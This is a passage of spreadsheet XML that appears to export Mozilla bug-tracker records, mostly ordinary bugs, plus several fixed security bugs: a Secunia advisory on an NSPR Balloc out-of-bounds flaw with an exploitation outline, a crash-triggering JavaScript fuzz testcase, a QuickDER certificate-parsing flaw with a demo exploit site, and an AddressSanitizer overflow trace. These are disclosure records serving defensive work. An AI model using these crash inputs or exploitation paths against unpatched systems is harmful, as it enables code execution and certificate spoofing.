        </is>
      </c>
      <c r="O4884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4884" t="inlineStr">
        <is>
          <t>[sg:high] XSS, worse?</t>
        </is>
      </c>
      <c r="Q4884" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4884" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4884" t="inlineStr">
        <is>
          <t>mozilla1.8rc1</t>
        </is>
      </c>
      <c r="T4884" t="n">
        <v>1</v>
      </c>
      <c r="U4884" t="n">
        <v>0</v>
      </c>
      <c r="V4884" t="n">
        <v>27</v>
      </c>
      <c r="W4884" t="inlineStr">
        <is>
          <t>controllers.appendController() and controllers.getControllerAt()
allows creation of false XPCOM objects.
Additionally, controllers.removeControllerAt(0) denies
some user operations including copy, paste, etc...</t>
        </is>
      </c>
      <c r="X4884" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4885">
      <c r="A4885" t="n">
        <v>18409</v>
      </c>
      <c r="B4885" t="inlineStr">
        <is>
          <t>1999-11-09 19:44:41 -0800</t>
        </is>
      </c>
      <c r="C4885" t="inlineStr">
        <is>
          <t>[Dogfood] Pasting from clipboard causes extraneous characters for any CR's in the data</t>
        </is>
      </c>
      <c r="D4885" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E4885" t="n">
        <v>1</v>
      </c>
      <c r="F4885" t="n">
        <v>1</v>
      </c>
      <c r="G4885" t="n">
        <v>3</v>
      </c>
      <c r="H4885" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4885" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4885" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K4885" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4885" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4885" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N4885" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4885" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q4885" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4885" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4885" t="inlineStr">
        <is>
          <t>M12</t>
        </is>
      </c>
      <c r="T4885" t="n">
        <v>1</v>
      </c>
      <c r="U4885" t="n">
        <v>0</v>
      </c>
      <c r="V4885" t="n">
        <v>79</v>
      </c>
      <c r="W4885" t="inlineStr">
        <is>
          <t>** Observed with 11/9/99 Win32 build (1999110911) **
This is a left over bug from Bug 15465. In that bug, rhp fixed the problem of not quoting 8-bit characters correctly.
This problem was mentioned in that bug but it has nto been fixed along with Bug 15465. Therefore there is now need to
create a new bug for it.
Problem description:
1. Place the Smoketest mailbox obtained at the above URL into your POP mail directory (or copy to IMAP from POP
   Mail directory)
2. Pick out any one of the 5 msgs in it and select it.
3. Under Plain Text send option, click on Reply button.
4. Observe that the quoted text body contains extraneous characters at the beginning or the end of each line
   of the quoted text. Depedening on the language of Windows OS, you may see a square character or
   a 1/8th muscial note symbol.
This is an eyesore and real detriment in composing Reply msgs and must be eliminated.</t>
        </is>
      </c>
      <c r="X4885" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4886">
      <c r="A4886" t="n">
        <v>516396</v>
      </c>
      <c r="B4886" t="inlineStr">
        <is>
          <t>2009-09-14 06:28:38 -0700</t>
        </is>
      </c>
      <c r="C4886" t="inlineStr">
        <is>
          <t>Array indexing error in NSPR's Balloc() leads to floating point memory vulnerability (SA36711)</t>
        </is>
      </c>
      <c r="D4886" t="inlineStr">
        <is>
          <t>2010-02-26 17:27:02 -0800</t>
        </is>
      </c>
      <c r="E4886" t="n">
        <v>1</v>
      </c>
      <c r="F4886" t="n">
        <v>1</v>
      </c>
      <c r="G4886" t="n">
        <v>3</v>
      </c>
      <c r="H4886" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4886" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J4886" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K4886" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4886" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4886" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4886" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4886" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4886" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4886" t="inlineStr">
        <is>
          <t>4.8.2</t>
        </is>
      </c>
      <c r="T4886" t="n">
        <v>1</v>
      </c>
      <c r="U4886" t="n">
        <v>0</v>
      </c>
      <c r="V4886" t="n">
        <v>113</v>
      </c>
      <c r="W4886" t="inlineStr">
        <is>
          <t>From Secunia to security@:
---------------------------
Secunia Research has discovered a vulnerability in Mozilla Firefox,
which can be exploited by malicious people to compromise a user's
system.
The vulnerability is caused due to an array indexing error while
allocating space for floating point numbers. This can be exploited to
trigger a memory corruption via a specially crafted floating point
number.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is confirmed in version 3.0.14 and 3.5.3. Other
versions may also be affected.
Vulnerability Details:
----------------------
The vulnerability is caused due to an error when converting strings to
floating point numbers in nsprpub/pr/src/misc/prdtoa.c.
The s2b() function takes the total number of digits and determines the
first number K for which : 1 &lt;&lt; K &gt;= (numdigits + 8)/9.
K is then passed to Balloc() to allocate memory. Balloc() dereferences
the static "freelist" buffer of 16 elements using K as an index. If K is
above 15, malformed pointers following the freelist array will be
returned from Balloc().
***
#define Kmax 15
...
static Bigint *freelist[Kmax+1];
...
Balloc ..(k)..
...
if (rv = freelist[k]) {	&lt;-- out of bounds
    freelist[k] = rv-&gt;next;
}
...
return rv;
***
For e.g. K = 17, a pointer to a limited heap buffer is returned from
Balloc(), and used to hold the converted big number. This results in a
heap-based buffer overflow, followed by a call to a function grabbed
from a corrupted pointer to a virtual function table. This results in
the execution of an arbitrary address when paired with heap spraying.
Closing comments:
-----------------
We have assigned this vulnerability Secunia advisory SA36711 and CVE
identifier CVE-2009-1563.
Credits should go to:
Alin Rad Pop, Secunia Research.
------------------------</t>
        </is>
      </c>
      <c r="X4886" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4887">
      <c r="A4887" t="n">
        <v>568855</v>
      </c>
      <c r="B4887" t="inlineStr">
        <is>
          <t>2010-05-28 09:32:49 -0700</t>
        </is>
      </c>
      <c r="C4887" t="inlineStr">
        <is>
          <t>Crash [@ nanojit::LIns::opcode] with non-native __proto__</t>
        </is>
      </c>
      <c r="D4887" t="inlineStr">
        <is>
          <t>2013-01-19 14:07:42 -0800</t>
        </is>
      </c>
      <c r="E4887" t="n">
        <v>1</v>
      </c>
      <c r="F4887" t="n">
        <v>1</v>
      </c>
      <c r="G4887" t="n">
        <v>3</v>
      </c>
      <c r="H4887" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4887" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4887" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4887" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4887" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4887" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4887" t="inlineStr">
        <is>
          <t>[ccbr][sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4887" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4887" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4887" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4887" t="n">
        <v>1</v>
      </c>
      <c r="U4887" t="n">
        <v>0</v>
      </c>
      <c r="V4887" t="n">
        <v>15</v>
      </c>
      <c r="W4887" t="inlineStr">
        <is>
          <t>this.__proto__ = Proxy.create({has:function(){return false}});
(function(){
  eval("(function(){ for(var j=0;j&lt;6;++j) if(j%2==1) p=0; })")();
})()
Triggers one of the following (all in a debug build):
* Crash [@ nanojit::LIns::opcode]
* Crash [@ nanojit::LirWriter::insImmI]
* Assertion failed: 0 (../nanojit/LIR.cpp:996)
* Assertion failure: status == ARECORD_COMPLETED || status == ARECORD_ABORTED || status == ARECORD_ERROR, at ../jstracer.cpp:7139
The proliferation of assertions and crashes may make this annoying for jsfunfuzz.</t>
        </is>
      </c>
      <c r="X4887" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4888">
      <c r="A4888" t="n">
        <v>868208</v>
      </c>
      <c r="B4888" t="inlineStr">
        <is>
          <t>2013-05-02 15:14:19 -0700</t>
        </is>
      </c>
      <c r="C4888" t="inlineStr">
        <is>
          <t>Remove refine and focus and show subtopics instead</t>
        </is>
      </c>
      <c r="D4888" t="inlineStr">
        <is>
          <t>2013-05-06 12:02:05 -0700</t>
        </is>
      </c>
      <c r="E4888" t="n">
        <v>1</v>
      </c>
      <c r="F4888" t="n">
        <v>1</v>
      </c>
      <c r="G4888" t="n">
        <v>5</v>
      </c>
      <c r="H4888" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4888" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4888" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4888" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4888" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4888" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4888" t="inlineStr">
        <is>
          <t>u=user c=wiki p=1 s=2013.9</t>
        </is>
      </c>
      <c r="Q4888" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4888" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4888" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T4888" t="n">
        <v>1</v>
      </c>
      <c r="U4888" t="n">
        <v>0</v>
      </c>
      <c r="V4888" t="n">
        <v>16</v>
      </c>
      <c r="W4888" t="inlineStr">
        <is>
          <t>Since we just switched over to a topic - subtopic system where articles live in only one place, refine and focus doesn't show anything. It's looking for articles in more than one topic. 
We should change how refine and focus works to instead list the child topics of the main topic. We should also change the name of it to "Related topics".</t>
        </is>
      </c>
      <c r="X4888" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4889">
      <c r="A4889" t="n">
        <v>886563</v>
      </c>
      <c r="B4889" t="inlineStr">
        <is>
          <t>2013-06-24 14:58:59 -0700</t>
        </is>
      </c>
      <c r="C4889" t="inlineStr">
        <is>
          <t>[MP] Story - Browser can display tab-modal, metro-styled prompts - Part I</t>
        </is>
      </c>
      <c r="D4889" t="inlineStr">
        <is>
          <t>2019-01-02 07:21:12 -0800</t>
        </is>
      </c>
      <c r="E4889" t="n">
        <v>1</v>
      </c>
      <c r="F4889" t="n">
        <v>1</v>
      </c>
      <c r="G4889" t="n">
        <v>6</v>
      </c>
      <c r="H4889" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4889" t="inlineStr">
        <is>
          <t>Tracking Graveyard</t>
        </is>
      </c>
      <c r="J4889" t="inlineStr">
        <is>
          <t>Metro Operations</t>
        </is>
      </c>
      <c r="K4889" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4889" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4889" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N4889" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4889" t="inlineStr">
        <is>
          <t>[Metro Preview] feature=story c=Content_features u=metro_firefox_user p=8</t>
        </is>
      </c>
      <c r="Q4889" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4889" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4889" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4889" t="n">
        <v>1</v>
      </c>
      <c r="U4889" t="n">
        <v>0</v>
      </c>
      <c r="V4889" t="n">
        <v>4</v>
      </c>
      <c r="W4889" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #831978 +++</t>
        </is>
      </c>
      <c r="X4889" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4890">
      <c r="A4890" t="n">
        <v>715073</v>
      </c>
      <c r="B4890" t="inlineStr">
        <is>
          <t>2012-01-03 23:32:24 -0800</t>
        </is>
      </c>
      <c r="C4890" t="inlineStr">
        <is>
          <t>Insufficient length checking in QuickDER decoder</t>
        </is>
      </c>
      <c r="D4890" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:16 -0700</t>
        </is>
      </c>
      <c r="E4890" t="n">
        <v>1</v>
      </c>
      <c r="F4890" t="n">
        <v>1</v>
      </c>
      <c r="G4890" t="n">
        <v>3</v>
      </c>
      <c r="H4890" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4890" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4890" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4890" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L4890" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4890" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4890" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4890" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4890" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4890" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4890" t="inlineStr">
        <is>
          <t>3.13.4</t>
        </is>
      </c>
      <c r="T4890" t="n">
        <v>1</v>
      </c>
      <c r="U4890" t="n">
        <v>0</v>
      </c>
      <c r="V4890" t="n">
        <v>54</v>
      </c>
      <c r="W4890" t="inlineStr">
        <is>
          <t>Created attachment 585661
Possible fix
I'm afraid I have to begin the new year with not so nice news - the "QuickDER" ASN.1 decoder in NSS has a flaw with rather serious consequences: while it rejects bogus (oversized) lengths when trying to match a buffer against a given template, it fails to properly detect a number of zero-length items which are illegal as per X.690.
This can cause all sorts of troubles: one of them is reported in bug 697420 (which happened to be the starting point for my discovery, actually). Depending on what exactly NSS - or the application - does after having called SEC_QuickDERDecodeItem, nasty bugs will occur, such as:
1) CERT_DecodeOCSPResponse() will mistakenly assume that it has successfully parsed a response, even if that response includes a zero-length ENUMERATED value. It will return the response to the caller, and when code subsequently - and rightfully - tries to clean up said response, CERT_DestroyOCSPResponse() will crash... because it's getting a bogus pointer from ocsp_GetResponseSignature(response), which it tries to dereference.
2) CERT_DecodeBasicConstraintValue is another case where illegal zero-length items lead to a serious problem: if a certificate includes a basicConstraints extension where the "CA" BOOLEAN is encoded with zero length, NSS mistakenly treats such a cert as a CA certificate (not as bad as Moxie's findings from 2002 about MS CAPI and basicConstraints, but still, quite worrying).
I stopped looking for further issues at that point, but it would be quite surprising if these were the only ones. From my reading of X.690, of the 25 ASN.1 UNIVERSAL types currently recognized/defined in secasn1t.h, the following 7 can never have zero length (when properly DER encoded): BOOLEAN, INTEGER, BIT STRING, OBJECT_IDENTIFIER, ENUMERATED, UTCTime, GeneralizedTime. QuickDER should abort further processing when the template specifies one of these types and the buffer being processed holds such an illegal encoding.
It's probably debatable what level of content checking should go into QuickDER (and what checks are better done in code which actually parses the values, such as DER_GetInteger), but some minimal zero-length sanity checks seem justified in QuickDER. The attached patch is a possible approach; note that due to re-indentation, the changes might appear larger at first sight than they effectively are.
A demo "exploit" for the two issues mentioned above can be seen by visiting https://orod.velox.ch. First, the CA cert attached to this bug needs to be installed and trusted for SSL. A default setup of Firefox will then crash immediately in CERT_DestroyOCSPResponse() when opening the above URL. Note that the "CA cert" isn't really a certificate with "CA" set to TRUE, but NSS considers it a valid CA cert.
As ASN.1 is at the heart of many parts of NSS (there are dozens of SEC_QuickDERDecodeItem calls in lib/, X.509/PKIX processing heavily depends on it), the potential impact of this issue should not be underestimated. Applications - and NSS itself - must be able to rely on SEC_QuickDERDecodeItem() rejecting invalid ASN.1 data, when asked to match this input against a given template. Note that the "classic" DER decoder, i.e. SEC_ASN1DecodeItem, has checks for illegal zero-length items, and will e.g. reject an OCSP response where the response status isn't encoded properly.
Finally, let me point out that the patch also includes a second, belt-and-suspenders type fix: when returning a "dest" item with zero length (for those ASN.1 types where this is acceptable as per X.690, such as strings), QuickDER should not fill bogus pointers into dest-&gt;data - if code dealing with a SECItem afterwards only checks for a non-NULL data pointer without looking at the SECItem's length at the same time, even more subtle bugs may surface (the CERT_DecodeBasicConstraintValue actually being an example of this).
I did not yet request a CVE ID number for this issue - let me know if I should do this, or if Mozilla can get an assignment.</t>
        </is>
      </c>
      <c r="X4890" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4891">
      <c r="A4891" t="n">
        <v>1258834</v>
      </c>
      <c r="B4891" t="inlineStr">
        <is>
          <t>2016-03-22 13:20:06 -0700</t>
        </is>
      </c>
      <c r="C4891" t="inlineStr">
        <is>
          <t>Disable Loop's e10s for FF 46 and Conversation pop-outs for FF 47</t>
        </is>
      </c>
      <c r="D4891" t="inlineStr">
        <is>
          <t>2016-03-22 15:35:47 -0700</t>
        </is>
      </c>
      <c r="E4891" t="n">
        <v>1</v>
      </c>
      <c r="F4891" t="n">
        <v>1</v>
      </c>
      <c r="G4891" t="n">
        <v>6</v>
      </c>
      <c r="H4891" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4891" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J4891" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K4891" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4891" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4891" t="inlineStr"/>
      <c r="Q4891" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4891" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4891" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4891" t="n">
        <v>1</v>
      </c>
      <c r="U4891" t="n">
        <v>0</v>
      </c>
      <c r="V4891" t="n">
        <v>8</v>
      </c>
      <c r="W4891" t="inlineStr">
        <is>
          <t>In exporting to mozilla-central, I want to:
- Disable the Loop specific e10s pref for FF 46. This will maintain status-quo for beta users.
- Disable the pop-out mode for FF 47. Since bug 1245813 hasn't been fully fixed yet, this seems the safest thing to do for these users.
Side effects of the export:
- Enable e10s on FF 47.</t>
        </is>
      </c>
      <c r="X4891" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4892">
      <c r="A4892" t="n">
        <v>1092702</v>
      </c>
      <c r="B4892" t="inlineStr">
        <is>
          <t>2014-11-01 23:18:11 -0700</t>
        </is>
      </c>
      <c r="C4892" t="inlineStr">
        <is>
          <t>Logviewer: Logviewer angular templates flicker on page load</t>
        </is>
      </c>
      <c r="D4892" t="inlineStr">
        <is>
          <t>2015-05-20 04:29:19 -0700</t>
        </is>
      </c>
      <c r="E4892" t="n">
        <v>1</v>
      </c>
      <c r="F4892" t="n">
        <v>1</v>
      </c>
      <c r="G4892" t="n">
        <v>7</v>
      </c>
      <c r="H4892" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4892" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4892" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4892" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4892" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4892" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4892" t="inlineStr"/>
      <c r="Q4892" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4892" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4892" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4892" t="n">
        <v>1</v>
      </c>
      <c r="U4892" t="n">
        <v>0</v>
      </c>
      <c r="V4892" t="n">
        <v>7</v>
      </c>
      <c r="W4892" t="inlineStr">
        <is>
          <t>A small polish-thing - at least on my (slow) machine, I observe a mildly annoying flash of the angular run-data templates during page load. I will attach a screen grab.
To reproduce
o click on any job
o click on the logviewer icon in the job panel
I think I have a working fix already which at least cleans up the angular stuff, I just want to do a bit more testing to be sure it's working properly on both browsers.</t>
        </is>
      </c>
      <c r="X4892" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4893">
      <c r="A4893" t="n">
        <v>888919</v>
      </c>
      <c r="B4893" t="inlineStr">
        <is>
          <t>2013-07-01 07:37:10 -0700</t>
        </is>
      </c>
      <c r="C4893" t="inlineStr">
        <is>
          <t>[User Story] Handling active FDN status</t>
        </is>
      </c>
      <c r="D4893" t="inlineStr">
        <is>
          <t>2013-09-11 03:32:51 -0700</t>
        </is>
      </c>
      <c r="E4893" t="n">
        <v>1</v>
      </c>
      <c r="F4893" t="n">
        <v>1</v>
      </c>
      <c r="G4893" t="n">
        <v>6</v>
      </c>
      <c r="H4893" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4893" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4893" t="inlineStr">
        <is>
          <t>Gaia::Dialer</t>
        </is>
      </c>
      <c r="K4893" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4893" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4893" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4893" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4893" t="inlineStr">
        <is>
          <t>[MOZ][UCID:Comms8, FT:comms, KOI:P1], [u=commsapps-user c=dialer p=0][Sprint 2][Status: UX provided initial spec, Gaia working on it]</t>
        </is>
      </c>
      <c r="Q4893" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4893" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4893" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4893" t="n">
        <v>1</v>
      </c>
      <c r="U4893" t="n">
        <v>0</v>
      </c>
      <c r="V4893" t="n">
        <v>9</v>
      </c>
      <c r="W4893" t="inlineStr">
        <is>
          <t>User Story:
As a user, if I dial any number in the dialer or by selecting a contact in the contacts app, outside what is allowed as per the FDN list, I expect to be informed that FDN mode is active and call is not placed.
As a user I expect the same restrictions to apply for SMS and MMS.
As a user I expect to be able to dial any emergency number even if FDN mode is active.
Precondition:
* SIM supports FDN
* FDN mode is active
Acceptance Criteria:
* Message is displayed to user if call can not be placed due to FDN restriction
* Message is displayed to user if SMS or MMS can not be sent due to FDN restrictions
* Any error messages are displayed to user</t>
        </is>
      </c>
      <c r="X4893" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4894">
      <c r="A4894" t="n">
        <v>992968</v>
      </c>
      <c r="B4894" t="inlineStr">
        <is>
          <t>2014-04-07 08:46:10 -0700</t>
        </is>
      </c>
      <c r="C4894" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-buffer-overflow [@ js::jit::CodeGeneratorShared::allocateCache]</t>
        </is>
      </c>
      <c r="D4894" t="inlineStr">
        <is>
          <t>2020-02-28 03:05:48 -0800</t>
        </is>
      </c>
      <c r="E4894" t="n">
        <v>1</v>
      </c>
      <c r="F4894" t="n">
        <v>1</v>
      </c>
      <c r="G4894" t="n">
        <v>3</v>
      </c>
      <c r="H4894" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4894" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4894" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4894" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4894" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4894" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4894" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4894" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q4894" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4894" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4894" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4894" t="n">
        <v>1</v>
      </c>
      <c r="U4894" t="n">
        <v>0</v>
      </c>
      <c r="V4894" t="n">
        <v>15</v>
      </c>
      <c r="W4894" t="inlineStr">
        <is>
          <t>The following trace came up while doing OOM fuzzing on mozilla-central revision :
==46451==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000063ec7 at pc 0x8a0820 bp 0x7f53ff5718f0 sp 0x7f53ff5718e8
WRITE of size 32 at 0x611000063ec7 thread T3 (Analysis Helper)
out of memory
out of memory
    #0 0x8a081f in unsigned long js::jit::CodeGeneratorShared::allocateCache&lt;js::jit::NameIC&gt;(js::jit::NameIC const&amp;) js/src/jit/IonCaches.h:127
    #1 0x8789f7 in js::jit::CodeGenerator::generateBody() js/src/jit/CodeGenerator.cpp:3240
    #2 0x89ad50 in js::jit::CodeGenerator::generate() js/src/jit/CodeGenerator.cpp:6235
    #3 0x969923 in js::jit::GenerateCode(js::jit::MIRGenerator*, js::jit::LIRGraph*, js::jit::MacroAssembler*) js/src/jit/Ion.cpp:1598
    #4 0xfc3f8f in js::WorkerThread::handleIonWorkload() js/src/jsworkers.cpp:798
    #5 0xfc3060 in js::WorkerThread::threadLoop() js/src/jsworkers.cpp:1034
    #6 0x10fe1a8 in nspr::Thread::ThreadRoutine(void*) js/src/vm/PosixNSPR.cpp:45
    #7 0x7f5405482e99 in start_thread /build/buildd/eglibc-2.15/nptl/pthread_create.c:308
    #8 0x7f54043763fc in ?? /build/buildd/eglibc-2.15/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:112
0x611000063ec7 is located 7 bytes to the right of 256-byte region [0x611000063dc0,0x611000063ec0)
allocated by thread T3 (Analysis Helper) here:
    #0 0x461116 in __interceptor_realloc _asan_rtl_
    #1 0x8f269a in js_realloc(void*, unsigned long) js/src/opt64asan-oom/js/src/../../dist/include/js/Utility.h:115
    #2 0x8f1cd4 in mozilla::VectorBase&lt;unsigned char, 0ul, js::SystemAllocPolicy, js::Vector&lt;unsigned char, 0ul, js::SystemAllocPolicy&gt; &gt;::appendN(unsigned char const&amp;, unsigned long) js/src/opt64asan-oom/js/src/../../dist/include/mozilla/Vector.h:925
    #3 0x8a0422 in unsigned long js::jit::CodeGeneratorShared::allocateCache&lt;js::jit::NameIC&gt;(js::jit::NameIC const&amp;) js/src/jit/shared/CodeGenerator-shared.h:251
    #4 0x8789f7 in js::jit::CodeGenerator::generateBody() js/src/jit/CodeGenerator.cpp:3240
